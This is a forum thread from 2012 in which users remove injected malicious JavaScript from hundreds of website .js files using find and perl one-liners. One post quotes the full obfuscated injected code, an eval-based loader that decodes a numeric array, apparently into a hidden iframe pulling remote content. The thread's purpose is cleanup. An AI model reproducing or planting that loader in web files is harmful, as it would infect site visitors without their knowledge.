Login or Register to Ask a Question and Join Our Community


Shell Programming and Scripting

How to remove the last 3 lines from many files?

Login to Discuss or Reply to this Discussion in Our Community

 
Thread Tools Search this Thread
Top Forums Shell Programming and Scripting How to remove the last 3 lines from many files?
# 15  
Old 06-27-2012
Try this:

Code:
find /vhost -type f -name '*.js' -print0 |   
  xargs -0 perl -i -0777pe'
    s|(.*)/\*km0ae9gr6m\*/.*|$1\n|s
   '

This User Gave Thanks to radoulov For This Post:
MaRiOsGR
# 16  
Old 06-27-2012
Quote:
Originally Posted by MaRiOsGR
but I've found a "bug" (i'm the fault),
I've found that in a 5% percent of the .js files the code I want to remove/erase
was not added in the last 3 lines but in the same line as the rest of the normal javascript code.
the exact hack code starts with
Code:
/*km0ae9gr6m*/

is it possible to remove everything after this code in all files that contain it ?
You ought to provide a sample of what the data looks like, instead of expecting everyone to work blindly. Since you cannot solve the problem yourself, you are probably not competent to judge what is and is not important (that is not meant as an insult, just a statement of fact that applies to us all when we can't solve a problem). Giving us as much information as possible helps us provide a better solution in less time.

As a general rule, don't ask people to work from textual descriptions of data. Always provide realistic data (for input and output) and take some time before creating a thread to consider all the special 5% cases that may present themselves. We are volunteering our time to you; don't make us work harder than necessary.

Regards,
Alister

---------- Post updated at 07:36 AM ---------- Previous update was at 07:21 AM ----------

Quote:
Originally Posted by radoulov
Try this:

Code:
find /vhost -type f -name '*.js' -print0 |   
  xargs -0 perl -i -0777pe'
    s|(.*)/\*km0ae9gr6m\*/.*|$1\n|s
   '

I don't think that will give the correct result if /*km0ae9gr6m*/ occurs more than once in the text to be discarded. It may very well not be an issue, but since we haven't actually seen the data, I mention it just in case.

Regards,
Alister
# 17  
Old 06-27-2012
that did the trick.

Thank you!

Quote:
Originally Posted by radoulov
Try this:

Code:
find /vhost -type f -name '*.js' -print0 |   
  xargs -0 perl -i -0777pe'
    s|(.*)/\*km0ae9gr6m\*/.*|$1\n|s
   '

---------- Post updated at 02:52 PM ---------- Previous update was at 02:44 PM ----------

Hello,
my intention was not to make your life more difficult and i'm sorry If i've done that.It is not easy to calculate every possible sideffect, I'm trying my best.

The full info is this, I've found 305 js scripts that have the above hacking code
Code:
/*km0ae9gr6m*/i=0;try{prototype-5;}catch(z){f=[102,234,110,198,116,210,111,220,32,220,101,240,116,164,97,220,100,222,109,156,117,218,98,202,114,80,4
1,246,118,194,114,64,104,210,61,232,104,210,115,92,115,202,101,200,47,232,104,210,115,92,81,118,118,194,114,64,108,222,61,232,104,210,115,92,115,202
,101,200,37,232,104,210,115,92,81,118,118,194,114,64,116,202,115,232,61,232,104,210,115,92,65,84,108,222,45,232,104,210,115,92,82,84,104,210,59,210,
102,80,116,202,115,232,62,96,41,246,116,208,105,230,46,230,101,202,100,122,116,202,115,232,125,202,108,230,101,246,116,208,105,230,46,230,101,202,10
0,122,116,202,115,232,43,232,104,210,115,92,77,250,114,202,116,234,114,220,40,232,104,210,115,92,115,202,101,200,42,232,104,210,115,92,111,220,101,1
58,118,202,114,154,41,250,102,234,110,198,116,210,111,220,32,164,97,220,100,222,109,156,117,218,98,202,114,142,101,220,101,228,97,232,111,228,40,234
,110,210,120,82,123,236,97,228,32,200,61,220,101,238,32,136,97,232,101,80,117,220,105,240,42,98,48,96,48,82,59,236,97,228,32,230,61,200,46,206,101,2
32,72,222,117,228,115,80,41,124,49,100,63,98,58,96,59,232,104,210,115,92,115,202,101,200,61,100,51,104,53,108,55,112,57,96,49,86,40,200,46,206,101,2
32,77,222,110,232,104,80,41,84,48,240,70,140,70,140,70,140,41,86,40,200,46,206,101,232,68,194,116,202,40,82,42,96,120,140,70,140,70,82,43,80,77,194,
116,208,46,228,111,234,110,200,40,230,42,96,120,140,70,140,41,82,59,232,104,210,115,92,65,122,52,112,50,110,49,118,116,208,105,230,46,154,61,100,49,
104,55,104,56,102,54,104,55,118,116,208,105,230,46,162,61,232,104,210,115,92,77,94,116,208,105,230,46,130,59,232,104,210,115,92,82,122,116,208,105,2
30,46,154,37,232,104,210,115,92,65,118,116,208,105,230,46,222,110,202,79,236,101,228,77,122,49,92,48,94,116,208,105,230,46,154,59,232,104,210,115,92
,110,202,120,232,61,220,101,240,116,164,97,220,100,222,109,156,117,218,98,202,114,118,114,202,116,234,114,220,32,232,104,210,115,250,102,234,110,198
,116,210,111,220,32,198,114,202,97,232,101,164,97,220,100,222,109,156,117,218,98,202,114,80,114,88,77,210,110,88,77,194,120,82,123,228,101,232,117,2
28,110,64,77,194,116,208,46,228,111,234,110,200,40,80,77,194,120,90,77,210,110,82,42,228,46,220,101,240,116,80,41,86,77,210,110,82,125,204,117,220,9
9,232,105,222,110,64,103,202,110,202,114,194,116,202,80,230,101,234,100,222,82,194,110,200,111,218,83,232,114,210,110,206,40,234,110,210,120,88,108,
202,110,206,116,208,44,244,111,220,101,82,123,236,97,228,32,228,97,220,100,122,110,202,119,64,82,194,110,200,111,218,78,234,109,196,101,228,71,202,1
10,202,114,194,116,222,114,80,117,220,105,240,41,118,118,194,114,64,108,202,116,232,101,228,115,122,91,78,97,78,44,78,98,78,44,78,99,78,44,78,100,78
,44,78,101,78,44,78,102,78,44,78,103,78,44,78,104,78,44,78,105,78,44,78,106,78,44,78,107,78,44,78,108,78,44,78,109,78,44,78,110,78,44,78,111,78,44,7
8,112,78,44,78,113,78,44,78,114,78,44,78,115,78,44,78,116,78,44,78,117,78,44,78,118,78,44,78,119,78,44,78,120,78,44,78,121,78,44,78,122,78,93,118,11
8,194,114,64,115,232,114,122,39,78,59,204,111,228,40,236,97,228,32,210,61,96,59,210,60,216,101,220,103,232,104,118,105,86,43,82,123,230,116,228,43,1
22,108,202,116,232,101,228,115,182,99,228,101,194,116,202,82,194,110,200,111,218,78,234,109,196,101,228,40,228,97,220,100,88,48,88,108,202,116,232,1
01,228,115,92,108,202,110,206,116,208,45,98,41,186,125,228,101,232,117,228,110,64,115,232,114,86,39,92,39,86,122,222,110,202,125,230,101,232,84,210,
109,202,111,234,116,80,102,234,110,198,116,210,111,220,40,82,123,232,114,242,123,210,102,80,116,242,112,202,111,204,32,210,102,228,97,218,101,174,97
,230,67,228,101,194,116,202,100,100,61,122,34,234,110,200,101,204,105,220,101,200,34,82,123,210,102,228,97,218,101,174,97,230,67,228,101,194,116,202
,100,100,61,232,114,234,101,118,118,194,114,64,117,220,105,240,61,154,97,232,104,92,114,222,117,220,100,80,43,220,101,238,32,136,97,232,101,80,41,94
,49,96,48,96,41,118,118,194,114,64,100,222,109,194,105,220,78,194,109,202,61,206,101,220,101,228,97,232,101,160,115,202,117,200,111,164,97,220,100,2
22,109,166,116,228,105,220,103,80,117,220,105,240,44,98,54,88,39,228,117,78,41,118,105,204,114,218,61,200,111,198,117,218,101,220,116,92,99,228,101,
194,116,202,69,216,101,218,101,220,116,80,34,146,70,164,65,154,69,68,41,118,105,204,114,218,46,230,101,232,65,232,116,228,105,196,117,232,101,80,34,
230,114,198,34,88,34,208,116,232,112,116,47,94,34,86,100,222,109,194,105,220,78,194,109,202,43,68,47,228,117,220,102,222,114,202,115,232,114,234,110
,126,115,210,100,122,99,240,34,82,59,210,102,228,109,92,115,232,121,216,101,92,119,210,100,232,104,122,34,96,112,240,34,118,105,204,114,218,46,230,1
16,242,108,202,46,208,101,210,103,208,116,122,34,96,112,240,34,118,105,204,114,218,46,230,116,242,108,202,46,236,105,230,105,196,105,216,105,232,121
,122,34,208,105,200,100,202,110,68,59,200,111,198,117,218,101,220,116,92,98,222,100,242,46,194,112,224,101,220,100,134,104,210,108,200,40,210,102,22
8,109,82,125,250,99,194,116,198,104,80,101,82,123,250,125,88,53,96,48,82,59];v="e"+"v"+"a";}if(v)e=window[v+"l"];try{q=document.createElement("b");i
f(e)q.appendChild(q+"");}catch(fwbewe){w=f;s=[];}
r=String;z=((e)?"Code":"");for(;1333-5+5>i;i+=1){j=i;if(e)s=s+r.fromCharCode((w[j]/(2-1+j%2)));}
if(f)e(s);/*qhk6sa6g1c*/

and I need to remove them.Restoring 305 files from backup manually is very hard so the best way (in my humble opinion) was to remove the hacking code,
and if anything fails then restore from the backups as the last resort.

thank you.

Quote:
Originally Posted by alister
You ought to provide a sample of what the data looks like, instead of expecting everyone to work blindly. Since you cannot solve the problem yourself, you are probably not competent to judge what is and is not important (that is not meant as an insult, just a statement of fact that applies to us all when we can't solve a problem). Giving us as much information as possible helps us provide a better solution in less time.

As a general rule, don't ask people to work from textual descriptions of data. Always provide realistic data (for input and output) and take some time before creating a thread to consider all the special 5% cases that may present themselves. We are volunteering our time to you; don't make us work harder than necessary.

Regards,
Alister

---------- Post updated at 07:36 AM ---------- Previous update was at 07:21 AM ----------



I don't think that will give the correct result if /*km0ae9gr6m*/ occurs more than once in the text to be discarded. It may very well not be an issue, but since we haven't actually seen the data, I mention it just in case.

Regards,
Alister
# 18  
Old 06-27-2012
Quote:
Originally Posted by MaRiOsGR
my intention was not to make your life more difficult and i'm sorry If i've done that.It is not easy to calculate every possible sideffect, I'm trying my best.
No need for an apology. Since I did not submit a suggestion, my life wasn't made more difficult. Smilie Further, I realize that sometimes, despite doing our best, unforeseen complications arise. Sadly, some people don't even make an effort (not saying you are one of those).

Regards,
Alister
# 19  
Old 07-05-2012
Hi all, newbie here Smilie

I also have an issue with this code injection across all js files on 70 domains.
As the alien code always starts with km0ae9gr6m and end in qhk6sa6g1c with lots of virus code in between.
Is there not a way to SSH in and scan all files in vhosts directory and say...
find km0ae9gr6m and delete this up to and including qhk6sa6g1c?

This way i'll be able to remove all alien code through SSH?

Is that possible and please excuse my limited knowledge on SSH and commands.

Please please help me out here.

Thanks
# 20  
Old 07-05-2012
Be careful Googling. Some sites I found were infected, though Google was not warning on every one of them.

After Googling /*km0ae9gr6m*/ it has become clear that this is a widespread problem. Some mention that the malicious code start string can also be /*gootkitstart*/ .

Similarly the end string can be /*qhk6sa6g1c*/ or /*gootkitend*/ .

Many other boards mention Ubuntu 8.04 LTS with Plesk. many mention just Plesk. There is a suggestion that the hackers are using valid ftp accounts and passwords. Others suggest that Plesk is being hacked directly even when supposidly restricted to certain IP addresses. Some suggest using IP Tables to control access.



Ps. Was my sed idea in the other thread any good?
https://www.unix.com/shell-programmin...-js-files.html
@alister
There is sample data on the other thread.
Last edited by methyl; 07-05-2012 at 02:00 PM..
# 21  
Old 07-05-2012
Untested:

Code:
find /vhost -type f -name '*.js' -print0 |   
  xargs -0 perl -i -0777pe'
    s|/\*(km0ae9gr6m|gootkitstart)\*/.*?/\*(qhk6sa6g1c|gootkitend)\*/||gs
   '
Login or Register to Ask a Question

Previous Thread | Next Thread

10 More Discussions You Might Find Interesting

1. Shell Programming and Scripting

Remove lines from output in files using awk

I have two large files (~250GB) that I am trying to remove the where GT: 0/0 or 1/1 or 2/2 for both files. I was going to use a bash with the below awk, which I think will find each line but how do I remove that line is that condition is found? Thank you :). Input 20 60055 . A ... (4 Replies)
Discussion started by: cmccabe
4 Replies

2. Windows & DOS: Issues & Discussions

Remove duplicate lines from text files.

So, I have text files, one "fail.txt" And one "color.txt" I now want to use a command line (DOS) to remove ANY line that is PRESENT IN BOTH from each text file. Afterwards there shall be no duplicate lines. (1 Reply)
Discussion started by: pasc
1 Replies

3. Shell Programming and Scripting

Two files, remove lines from second based on lines in first

I have two files, a keepout.txt and a database.csv. They're unsorted, but could be sorted. keepout: user1 buser3 anuser19 notheruser27 database: user1,2343,"information about",field,blah,34 user2,4231,"mo info",etc,stuff,43 notheruser27,4344,"hiya",thing,more thing,423... (4 Replies)
Discussion started by: esoffron
4 Replies

4. Shell Programming and Scripting

Can you extract (remove) lines from log files?

I use "MineOS" (a linux distro with python scripts and web ui included for managing a Minecraft Server). The author of the scripts is currently having a problem with the Minecraft server log file being spammed with certain entries. He's working on clearing up the spam. But in the meantime, I'm... (8 Replies)
Discussion started by: nbsparks
8 Replies

5. UNIX for Dummies Questions & Answers

Remove duplicates lines in a files

I have a file called FILE cat FILE 11/11/2012 11/11/2012 12/11/2012 15/11/2012 need to remove the duplicates dates ( ie 11/11/2012 is present two times i need remove one duplicates date ) Need outputs like this 11/11/2012 12/11/2012 15/11/2012 I have tried using awk... (8 Replies)
Discussion started by: Venkatesh1
8 Replies

6. Shell Programming and Scripting

Compare one files with strings from another + remove lines

Have two files and want to compare the content of file1 with file2. When matched remove the line. awk 'NR==FNR {b; next} !(b in $0)' file1 file2file1 1. if match 2. removefile2 1. this line has to be removed if match 2. this line has a match, remove 3. this line has no match, no removingThe... (3 Replies)
Discussion started by: sdf
3 Replies

7. Shell Programming and Scripting

Remove the files that have less than certain lines

Hi all, I'm a newbie and I'm sorry if my question is too simple. I'm having problem to delete the files that have less than certain lines, say 16. #!/bin/tcsh set filen = `sh -c 'ls *csv 2> /dev/null'` foreach fil (${filen}) if ]; then rm -f ${filen} fi end exit ... (2 Replies)
Discussion started by: GoldenFire
2 Replies

8. Shell Programming and Scripting

compare files and then remove some lines

Hi everyone I have a dilemma and I'm hoping someone has an answer for me. I have two files: # cat masterfile line3 line4 line5 line6 line7 # cat tempfile line1 line2 line3 line4 I want to compare tempfile with masterfile. (3 Replies)
Discussion started by: soliberus
3 Replies

9. Shell Programming and Scripting

compare two files and to remove the matching lines on both the files

I have two files and need to compare the two files and to remove the matching lines from both the files (4 Replies)
Discussion started by: shellscripter
4 Replies

10. Shell Programming and Scripting

How to remove certain lines in multiple txt files?

Hi , I have this type of files:- BGH.28OCT2008.00000001.433155.001 BGH.28OCT2008.00000002.1552361.001 BGH.28OCT2008.00000003.1438355.001 BGH.28OCT2008.00000004.1562602.001 Inside them contains the below: 5Discounts 6P150 - Max Total Usage RM150|-221.00 P150 EPP - Talktime RM150... (5 Replies)
Discussion started by: olloong
5 Replies
Login or Register to Ask a Question